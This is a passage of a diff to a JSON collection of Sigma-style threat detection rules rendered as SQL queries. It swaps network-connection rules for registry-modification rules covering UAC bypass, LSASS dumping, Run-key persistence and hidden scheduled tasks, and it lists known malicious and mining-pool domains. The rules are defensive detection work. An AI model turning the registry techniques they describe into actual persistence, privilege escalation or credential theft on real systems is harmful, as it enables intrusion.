(TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "author": "frack113", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "status": "test", + "description": "Detects registry persistence technique using 
the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218.003" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname 
LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", + "status": "test", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 
'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + ], + "filename": "registry_set_comhijack_sdclt.yml" + }, + { + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": 
"50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", + "status": "experimental", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". 
Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.impact", - "attack.t1496" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", "tags": 
[ - "attack.lateral_movement" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "One might need 
to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\edge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. 
Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" + "SELECT * FROM 
logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "status": "experimental", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue 
LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Change User Account Associated with the FAX Service", + "id": 
"e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = 
